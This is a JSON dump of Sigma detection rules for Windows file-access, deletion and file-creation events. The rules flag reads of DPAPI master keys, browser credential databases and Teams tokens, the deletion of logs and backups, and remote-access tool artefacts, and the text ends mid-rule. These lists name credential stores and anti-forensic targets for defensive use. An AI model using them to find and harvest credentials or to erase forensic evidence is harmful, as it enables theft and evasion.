    "content": "title: Access To Windows DPAPI Master Keys By Uncommon Applications\nid: 46612ae6-86be-4802-bc07-39b59feb1309\nstatus: test\ndescription: |\n    Detects file access requests to the Windows Data Protection API Master keys by an uncommon application.\n    This can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\nreferences:\n    - http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/\n    - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-17\nmodified: 2024-07-29\ntags:\n    - attack.credential-access\n    - attack.t1555.004\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|contains:\n            - '\\Microsoft\\Protect\\S-1-5-18\\' # For System32\n            - '\\Microsoft\\Protect\\S-1-5-21-' # For Users\n    filter_system_folders:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\n# Increase level after false positives filters are good enough\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_gpo_files.yml",
    "content": "title: Access To Potentially Sensitive Sysvol Files By Uncommon Applications\nid: d51694fe-484a-46ac-92d6-969e76d60d10\nrelated:\n    - id: 8344c19f-a023-45ff-ad63-a01c5396aea0\n      type: derived\nstatus: test\ndescription: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.\nreferences:\n    - https://github.com/vletoux/pingcastle\nauthor: frack113\ndate: 2023-12-21\nmodified: 2024-07-29\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: file_access\n    product: windows\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|startswith: '\\\\'\n        FileName|contains|all:\n            - '\\sysvol\\'\n            - '\\Policies\\'\n        FileName|endswith:\n            - 'audit.csv'\n            - 'Files.xml'\n            - 'GptTmpl.inf'\n            - 'groups.xml'\n            - 'Registry.pol'\n            - 'Registry.xml'\n            - 'scheduledtasks.xml'\n            - 'scripts.ini'\n            - 'services.xml'\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_main_explorer:\n        Image: 'C:\\Windows\\explorer.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_susp_process_access_browser_cred_files.yml",
    "content": "title: Suspicious File Access to Browser Credential Storage\nid: a1dfd976-4852-41d4-9507-dc6590a3ccd0\nstatus: experimental\ndescription: |\n    Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.\n    Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.\n    This behavior is commonly observed in credential stealing malware.\nreferences:\n    - https://github.com/splunk/security_content/blob/7283ba3723551f46b69dfeb23a63b358afb2cb0e/lookups/browser_app_list.csv?plain=1\n    - https://fourcore.io/blogs/threat-hunting-browser-credential-stealing\nauthor: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore\ndate: 2025-05-22\ntags:\n    - attack.credential-access\n    - attack.t1555.003\n    - attack.discovery\n    - attack.t1217\nlogsource:\n    category: file_access\n    product: windows\ndetection:\n    selection_browser_paths:\n        FileName|contains:\n            - '\\Sputnik\\Sputnik'\n            - '\\MapleStudio\\ChromePlus'\n            - '\\QIP Surf'\n            - '\\BlackHawk'\n            - '\\7Star\\7Star'\n            - '\\CatalinaGroup\\Citrio'\n            - '\\Google\\Chrome'\n            - '\\Coowon\\Coowon'\n            - '\\CocCoc\\Browser'\n            - '\\uCozMedia\\Uran'\n            - '\\Tencent\\QQBrowser'\n            - '\\Orbitum'\n            - '\\Slimjet'\n            - '\\Iridium'\n            - '\\Vivaldi'\n            - '\\Chromium'\n            - '\\GhostBrowser'\n            - '\\CentBrowser'\n            - '\\Xvast'\n            - '\\Chedot'\n            - '\\SuperBird'\n            - '\\360Browser\\Browser'\n            - '\\360Chrome\\Chrome'\n            - '\\Comodo\\Dragon'\n            - '\\BraveSoftware\\Brave-Browser'\n            - '\\Torch'\n            - '\\UCBrowser\\'\n            - '\\Blisk'\n            - '\\Epic Privacy Browser'\n            - '\\Nichrome'\n            - '\\Amigo'\n            - '\\Kometa'\n            - '\\Xpom'\n            - '\\Microsoft\\Edge'\n            - '\\Liebao7Default\\EncryptedStorage'\n            - '\\AVAST Software\\Browser'\n            - '\\Kinza'\n            - '\\Mozilla\\SeaMonkey\\'\n            - '\\Comodo\\IceDragon\\'\n            - '\\8pecxstudios\\Cyberfox\\'\n            - '\\FlashPeak\\SlimBrowser\\'\n            - '\\Moonchild Productions\\Pale Moon\\'\n    selection_browser_subpaths:\n        FileName|contains:\n            - '\\Profiles\\'\n            - '\\User Data'\n    selection_cred_files:\n        - FileName|contains:\n              - '\\Login Data'\n              - '\\Cookies'\n              - '\\EncryptedStorage'\n              - '\\WebCache\\'\n        - FileName|endswith:\n              - 'cert9.db'\n              - 'cookies.sqlite'\n              - 'formhistory.sqlite'\n              - 'key3.db'\n              - 'key4.db'\n              - 'Login Data.sqlite'\n              - 'logins.json'\n              - 'places.sqlite'\n    filter_main_img:\n        Image|endswith:\n            - '\\Sputnik.exe'\n            - '\\ChromePlus.exe'\n            - '\\QIP Surf.exe'\n            - '\\BlackHawk.exe'\n            - '\\7Star.exe'\n            - '\\Sleipnir5.exe'\n            - '\\Citrio.exe'\n            - '\\Chrome SxS.exe'\n            - '\\Chrome.exe'\n            - '\\Coowon.exe'\n            - '\\CocCocBrowser.exe'\n            - '\\Uran.exe'\n            - '\\QQBrowser.exe'\n            - '\\Orbitum.exe'\n            - '\\Slimjet.exe'\n            - '\\Iridium.exe'\n            - '\\Vivaldi.exe'\n            - '\\Chromium.exe'\n            - '\\GhostBrowser.exe'\n            - '\\CentBrowser.exe'\n            - '\\Xvast.exe'\n            - '\\Chedot.exe'\n            - '\\SuperBird.exe'\n            - '\\360Browser.exe'\n            - '\\360Chrome.exe'\n            - '\\dragon.exe'\n            - '\\brave.exe'\n            - '\\torch.exe'\n            - '\\UCBrowser.exe'\n            - '\\BliskBrowser.exe'\n            - '\\Epic Privacy Browser.exe'\n            - '\\nichrome.exe'\n            - '\\AmigoBrowser.exe'\n            - '\\KometaBrowser.exe'\n            - '\\XpomBrowser.exe'\n            - '\\msedge.exe'\n            - '\\LiebaoBrowser.exe'\n            - '\\AvastBrowser.exe'\n            - '\\Kinza.exe'\n            - '\\seamonkey.exe'\n            - '\\icedragon.exe'\n            - '\\cyberfox.exe'\n            - '\\SlimBrowser.exe'\n            - '\\palemoon.exe'\n    filter_main_path:\n        Image|contains:\n            - '\\Sputnik\\'\n            - '\\MapleStudio\\'\n            - '\\QIP Surf\\'\n            - '\\BlackHawk\\'\n            - '\\7Star\\'\n            - '\\Fenrir Inc\\'\n            - '\\CatalinaGroup\\'\n            - '\\Google\\'\n            - '\\Coowon\\'\n            - '\\CocCoc\\'\n            - '\\uCozMedia\\'\n            - '\\Tencent\\'\n            - '\\Orbitum\\'\n            - '\\Slimjet\\'\n            - '\\Iridium\\'\n            - '\\Vivaldi\\'\n            - '\\Chromium\\'\n            - '\\GhostBrowser\\'\n            - '\\CentBrowser\\'\n            - '\\Xvast\\'\n            - '\\Chedot\\'\n            - '\\SuperBird\\'\n            - '\\360Browser\\'\n            - '\\360Chrome\\'\n            - '\\Comodo\\'\n            - '\\BraveSoftware\\'\n            - '\\Torch\\'\n            - '\\UCBrowser\\'\n            - '\\Blisk\\'\n            - '\\Epic Privacy Browser\\'\n            - '\\Nichrome\\'\n            - '\\Amigo\\'\n            - '\\Kometa\\'\n            - '\\Xpom\\'\n            - '\\Microsoft\\'\n            - '\\Liebao7\\'\n            - '\\AVAST Software\\'\n            - '\\Kinza\\'\n            - '\\Mozilla\\'\n            - '\\8pecxstudios\\'\n            - '\\FlashPeak\\'\n            - '\\Moonchild Productions\\'\n    filter_main_system:\n        Image: System\n        ParentImage: Idle\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        Image|contains: '\\Microsoft\\Windows Defender\\'\n        Image|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_optional_msiexec:\n        ParentImage: 'C:\\Windows\\System32\\msiexec.exe'\n    filter_optional_other:\n        Image|endswith: '\\everything.exe'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Antivirus, Anti-Spyware, Anti-Malware Software\n    - Legitimate software accessing browser data for synchronization or backup purposes.\n    - Legitimate software installed on partitions other than \"C:\\\"\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_access/file_access_win_teams_sensitive_files.yml",
    "content": "title: Microsoft Teams Sensitive File Access By Uncommon Applications\nid: 65744385-8541-44a6-8630-ffc824d7d4cc\nstatus: test\ndescription: |\n    Detects file access attempts to sensitive Microsoft Teams files (leveldb, cookies) by an uncommon process.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\n    - https://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens\nauthor: '@SerkinValery'\ndate: 2024-07-22\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: windows\n    category: file_access\n    definition: 'Requirements: Microsoft-Windows-Kernel-File ETW provider'\ndetection:\n    selection:\n        FileName|contains:\n            - '\\Microsoft\\Teams\\Cookies'\n            - '\\Microsoft\\Teams\\Local Storage\\leveldb'\n    filter_main_legit_location:\n        # Note: it's best to filter the full path to avoid false negatives\n        Image|endswith: '\\Microsoft\\Teams\\current\\Teams.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml",
    "content": "title: Unusual File Modification by dns.exe\nid: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3\nrelated:\n    - id: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0 # FileDelete version\n      type: similar\nstatus: test\ndescription: Detects an unexpected file being modified by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)\nreferences:\n    - https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html\nauthor: Tim Rauch (Nextron Systems), Elastic (idea)\ndate: 2022-09-27\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: file_change\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dns.exe'\n    filter:\n        TargetFilename|endswith: '\\dns.log'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml",
    "content": "title: Backup Files Deleted\nid: 06125661-3814-4e03-bfa2-1e4411c60ac3\nstatus: test\ndescription: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files\nauthor: frack113\ndate: 2022-01-02\nmodified: 2023-02-15\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wt.exe'\n            - '\\rundll32.exe'\n            - '\\regsvr32.exe'\n        TargetFilename|endswith:\n            - '.VHD'\n            - '.bac'\n            - '.bak'\n            - '.wbcat'\n            - '.bkf'\n            - '.set'\n            - '.win'\n            - '.dsk'\n    condition: selection\nfalsepositives:\n    - Legitimate usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_event_log_files.yml",
    "content": "title: EventLog EVTX File Deleted\nid: 63c779ba-f638-40a0-a593-ddd45e8b1ddc\nstatus: test\ndescription: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\winevt\\Logs\\'\n        TargetFilename|endswith: '.evtx'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_exchange_powershell_logs.yml",
    "content": "title: Exchange PowerShell Cmdlet History Deleted\nid: a55349d8-9588-4c5a-8e3b-1925fe2a4ffe\nstatus: test\ndescription: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence\nreferences:\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\nmodified: 2022-12-30\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: '\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\'\n        TargetFilename|contains: '_Cmdlet_'\n    condition: selection\nfalsepositives:\n    - Possible FP during log rotation\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_iis_access_logs.yml",
    "content": "title: IIS WebServer Access Logs Deleted\nid: 3eb8c339-a765-48cc-a150-4364c04652bf\nrelated:\n    - id: 0649be4a-aeb0-45b0-b89e-7f1668f6d9c0\n      type: similar\nstatus: test\ndescription: Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence\nreferences:\n    - https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html\nauthor: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-16\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: '\\inetpub\\logs\\LogFiles\\'\n        TargetFilename|endswith: '.log'\n    condition: selection\nfalsepositives:\n    - During uninstallation of the IIS service\n    - During log rotation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_own_image.yml",
    "content": "title: Process Deletion of Its Own Executable\nid: f01d1f70-cd41-42ec-9c0b-26dd9c22bf29\nstatus: test\ndescription: |\n    Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.\nreferences:\n    - https://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion\nauthor: Max Altgelt (Nextron Systems)\ndate: 2024-09-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|fieldref: Image\n    condition: selection\nfalsepositives:\n    - Some false positives are to be expected from uninstallers.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_powershell_command_history.yml",
    "content": "title: PowerShell Console History Logs Deleted\nid: ff301988-c231-4bd0-834c-ac9d73b86586\nstatus: test\ndescription: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\PSReadLine\\ConsoleHost_history.txt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml",
    "content": "title: Prefetch File Deleted\nid: 0a1f9d29-6465-4776-b091-7f43b26e4c89\nstatus: test\ndescription: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence\nreferences:\n    - Internal Research\n    - https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/\nauthor: Cedric MAURUGEON\ndate: 2021-09-29\nmodified: 2024-01-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|contains: ':\\Windows\\Prefetch\\'\n        TargetFilename|endswith: '.pf'\n    filter_main_svchost:\n        Image|endswith: ':\\windows\\system32\\svchost.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_teamviewer_logs.yml",
    "content": "title: TeamViewer Log File Deleted\nid: b1decb61-ed83-4339-8e95-53ea51901720\nstatus: test\ndescription: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\nauthor: frack113\ndate: 2022-01-16\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|contains: '\\TeamViewer_'\n        TargetFilename|endswith: '.log'\n    filter:\n        Image: C:\\Windows\\system32\\svchost.exe\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_delete_tomcat_logs.yml",
    "content": "title: Tomcat WebServer Logs Deleted\nid: 270185ff-5f50-4d6d-a27f-24c3b8c9fef8\nstatus: test\ndescription: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence\nreferences:\n    - Internal Research\n    - https://linuxhint.com/view-tomcat-logs-windows/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-16\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - '\\Tomcat'\n            - '\\logs\\'\n        TargetFilename|contains:\n            - 'catalina.'\n            - '_access_log.'\n            - 'localhost.'\n    condition: selection\nfalsepositives:\n    - During uninstallation of the tomcat server\n    - During log rotation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml",
    "content": "title: File Deleted Via Sysinternals SDelete\nid: 6ddab845-b1b8-49c2-bbf7-1a11967f64bc\nstatus: test\ndescription: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/9\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.AAA'\n            - '.ZZZ'\n    filter_wireshark:\n        TargetFilename|endswith: '\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml",
    "content": "title: Unusual File Deletion by Dns.exe\nid: 8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0\nrelated:\n    - id: 9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3 # FileChange version\n      type: similar\nstatus: test\ndescription: Detects an unexpected file being deleted by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)\nreferences:\n    - https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html\nauthor: Tim Rauch (Nextron Systems), Elastic (idea)\ndate: 2022-09-27\nmodified: 2023-02-15\ntags:\n    - attack.persistence\n    - attack.initial-access\n    - attack.t1133\nlogsource:\n    category: file_delete\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\dns.exe'\n    filter:\n        TargetFilename|endswith: '\\dns.log'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_delete/file_delete_win_zone_identifier_ads_uncommon.yml",
    "content": "title: ADS Zone.Identifier Deleted By Uncommon Application\nid: 3109530e-ab47-4cc6-a953-cac5ebcc93ae\nrelated:\n    - id: 7eac0a16-5832-4e81-865f-0268a6d19e4b\n      type: similar\nstatus: test\ndescription: Detects the deletion of the \"Zone.Identifier\" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.\nreferences:\n    - https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-04\nmodified: 2025-07-04\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    category: file_delete\ndetection:\n    selection:\n        TargetFilename|endswith: ':Zone.Identifier'\n    filter_main_generic:\n        # Note: in some envs this activity might be performed by other software. Apply additional filters as necessary\n        Image:\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n            - 'C:\\Windows\\SysWOW64\\explorer.exe'\n            - 'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n    filter_optional_browsers_chrome:\n        Image:\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_browsers_firefox:\n        Image:\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n    filter_optional_browsers_msedge:\n        Image:\n            - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n            - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other third party applications not listed.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml",
    "content": "title: ADSI-Cache File Creation By Uncommon Tool\nid: 75bf09fa-1dd7-4d18-9af9-dd9e492562eb\nstatus: test\ndescription: Detects the creation of an \"Active Directory Schema Cache File\" (.sch) file by an uncommon tool.\nreferences:\n    - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961\n    - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/\n    - https://github.com/fox-it/LDAPFragger\nauthor: xknow @xknow_infosec, Tim Shelton\ndate: 2019-03-24\nmodified: 2023-10-18\ntags:\n    - attack.t1001.003\n    - attack.command-and-control\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Local\\Microsoft\\Windows\\SchCache\\'\n        TargetFilename|endswith: '.sch'\n    filter_main_generic:\n        - Image|endswith:\n              - ':\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe'\n              - ':\\Windows\\CCM\\CcmExec.exe'\n              - ':\\windows\\system32\\dllhost.exe'\n              - ':\\Windows\\system32\\dsac.exe'\n              - ':\\Windows\\system32\\efsui.exe'\n              - ':\\windows\\system32\\mmc.exe'\n              - ':\\windows\\system32\\svchost.exe'\n              - ':\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n              - ':\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe'\n        - Image|contains:\n              - ':\\Windows\\ccmsetup\\autoupgrade\\ccmsetup' # C:\\Windows\\ccmsetup\\autoupgrade\\ccmsetup.TMC00002.40.exe\n              - ':\\Program Files\\SentinelOne\\Sentinel Agent' # C:\\Program Files\\SentinelOne\\Sentinel Agent 21.7.7.40005\\SentinelAgent.exe\n    filter_main_office:\n        Image|contains|all:\n            - ':\\Program Files\\'\n            - '\\Microsoft Office'\n        Image|endswith: '\\OUTLOOK.EXE'\n    filter_optional_ldapwhoami:\n        Image|endswith: '\\LANDesk\\LDCLient\\ldapwhoami.exe'\n    filter_optional_citrix:\n        # Example:\n        #   TargetFilename=C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Microsoft\\Windows\\SchCache\\REDACTED.com.sch\n        Image|endswith: ':\\Program Files\\Citrix\\Receiver StoreFront\\Services\\DefaultDomainServices\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate tools which perform ADSI (LDAP) operations, e.g. any remoting activity by MMC, PowerShell, Windows etc.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml",
    "content": "title: Advanced IP Scanner - File Event\nid: fed85bf9-e075-4280-9159-fbe8a023d6fa\nrelated:\n    - id: bef37fa2-f205-4a7b-b484-0759bfd5f86f\n      type: derived\nstatus: test\ndescription: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.\nreferences:\n    - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/\n    - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\n    - https://labs.f-secure.com/blog/prelude-to-ransomware-systembc\n    - https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf\n    - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer\nauthor: '@ROxPinTeddy'\ndate: 2020-05-12\nmodified: 2022-11-29\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\Advanced IP Scanner 2'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative use\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_anydesk_artefact.yml",
    "content": "title: Anydesk Temporary Artefact\nid: 0b9ad457-2554-44c1-82c2-d56a99c42377\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-02-11\nmodified: 2024-07-20\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '\\AppData\\Roaming\\AnyDesk\\user.conf'\n            - '\\AppData\\Roaming\\AnyDesk\\system.conf'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml",
    "content": "title: Suspicious Binary Writes Via AnyDesk\nid: 2d367498-5112-4ae5-a06a-96e7bc33a211\nstatus: test\ndescription: |\n    Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\n    According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\n    which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-28\nmodified: 2025-02-24\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\AnyDesk.exe'\n            - '\\AnyDeskMSI.exe'\n        TargetFilename|endswith:\n            - '.dll'\n            - 